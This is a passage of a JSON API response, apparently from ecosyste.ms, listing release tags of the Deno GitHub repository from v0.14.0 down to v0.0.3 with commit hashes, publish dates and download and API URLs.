@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno